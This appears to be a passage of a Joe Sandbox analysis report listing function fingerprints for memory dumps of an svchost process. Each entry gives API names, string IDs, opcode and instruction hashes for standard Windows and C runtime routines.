• Instruction Fuzzy Hash: 5531E032A2866896E716DF21E84879E37B4F743BCCF148016EE4E43788DB39C968C704

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction ID: de33d0b7403191fafe040a8392dc9819e369d541baf2522363be2d8de6ed28d3
• Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction Fuzzy Hash: 65F03C72B1865592FB618F21E8D479A6771F749B8CF848022DA8D46A58EB2CC68DCB00

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction ID: f286dd60a5522db936dfed800217cc6c1f6d92c6ac24c710919bdd42c6a300c2
• Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction Fuzzy Hash: 83F09671B2971481FB158B29E8647D96370EB8AB69F54021BCAAE463E4EF3CC44CC300

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction ID: bfab23f09705f7b99784b468b9aa13085e235c3ca8d88f22da8ea4acb8ae1034
• Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction Fuzzy Hash: 55F05E70A18BA482EA418F52B92419A6371EB4EFC8F044032EE8E07B18EE3CC4498714

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
• Instruction ID: 898435458d9111b53b1cdb683c1f8426028e1d60795762d314f968d6b34372fa
• Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
• Instruction Fuzzy Hash: EE02A73262DB9486E7A1CB55E49039AB7B1F3C5798F104116EACE87BA9DF7CC458CB00

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
• Instruction ID: a54e80bb82137fd852d70d2d4b38f9064022f1ae65caaef9bbb60a77a2beb057
• Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
• Instruction Fuzzy Hash: 1061CB3692DB94C6E761CB55E48435AB7B0F389798F10011AEACE47BA8DB7CC458CF00

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction ID: 1a93a27212db14d107c445d7083ca94b3231e77f583d31af7090b27211639dc1
• Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction Fuzzy Hash: 16110632E1CF7821F666156AD4753E513706B7B3BCF080626A97E077D6FB24C8AC5211

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
• Instruction ID: 3a2af3483e4300a1187523e9586c3a768ce971fdbc56a475376103612aa46848
• Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
• Instruction Fuzzy Hash: CD613632A19B988AEB619F69D4803DD77B0F74AB8CF144216EE4D17B98DB38C599C700

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction ID: 643f0b19000955fd4531acc435b5a4dff8720e58fb8e76c4df4d970b4f056407
• Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction Fuzzy Hash: 4F51B072928BA0CAEBB98F25948439D77B0F756B8DF184117DA9D47BD9CB38C468C700

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070231267.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_17953770000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction ID: 8b5f16ec00f45c4a7ced28edb1d3fb9ff7d8c5f0b459b66f842ca35e7ccd5795
• Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction Fuzzy Hash: C2517032908AA0CAFBA68F25954439877F0F39AB98F185117EF5D87BD5CB38D468C700

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
• Instruction ID: 06d4593c12757a61a920345c0e2df76c0e129f7e16386725fafdea6654bba7a9
• Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
• Instruction Fuzzy Hash: C5D1BF32B19A9489E712CFA9D4503DC3BB1F35AB9CF148216DE5E97B99EB34C50AC340

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
• Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
• Instruction ID: bb6b78b593707857310a3324dd096787fdb4aa97373bc89aca0eb61e411b0d18
• Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
• Instruction Fuzzy Hash: 1D118B36918AA8C6E716DF66A81818977B0F78AF89F084026EBCD43716EE38C458C744

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
• Instruction ID: aa35c425ef9fc4d6b2506b4269cbb304a299e5433bf6d60ac2d50f473d078f8f
• Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
• Instruction Fuzzy Hash: D191A032F1966485FB629F6594A03EE2BB0B746B8CF14410BDE4E67B95EF35C48AC700

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
• Instruction ID: 9256c04884558f9edc0885e3b789def796bf32de9d9fbb855d04952720b7616f
• Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
• Instruction Fuzzy Hash: A6111C32B14B1989EB008B61E8543E833B4F71A75CF440E22DBAD467A4EB78C1A88380

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction ID: 9464ef761ac9fd1665e8c61fdda8a34e1658d64a02c8beec298f218a00bbb3c3
• Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction Fuzzy Hash: AB71D736A287A146E766DF25D8443EA67B4F38678DF44002BDE4E53F89DE35C689C700

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070231267.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_17953770000_svchost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
• Instruction ID: 4c013e113835d3432451d184c3eefa52352108669f7f627b66b82dfff524006d
• Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
• Instruction Fuzzy Hash: 0D615433A19B988AEB229F65D4807DD77B0F34AB8CF044616EE4D17B98DB78D199C700

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
• Instruction ID: 19b6e1f95d14bb4b976e64b46c6a80dd0e96378682549d0fa7c6c0d7907e3b1f
• Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
• Instruction Fuzzy Hash: 1651E732E2C7A181F6769E29A4583EAA7B1F387748F440127DE5D03B59DB39C98CC740

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
• Instruction ID: 0369f9cddf07d3ef424b9edaf2e32a6908f06cc7a4d25baa8926a904c7eb2ec1
• Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
• Instruction Fuzzy Hash: DE41C432B19A9482EB21DF25E8543E977B0F799798F504026EE4D87794EF3CC449C744

APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction ID: 6bf90dc9676103b16e0bcc020ce2c1a8f578aef3304401d1f88f1bac78d3cb30
• Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction Fuzzy Hash: C8112B36619B9482EB628B15E44439A77F5F78AB98F584221EFCC07758EF3CC565CB00

APIs
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: 2a4f8d57dda99efd85754da4b3249eaba21036bec465e402961c7aa9532c5649
• Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction Fuzzy Hash: F0119135A15B6881FA56DB66A4092A973F1FB8AFC8F584026DE8D87765EF38C446C300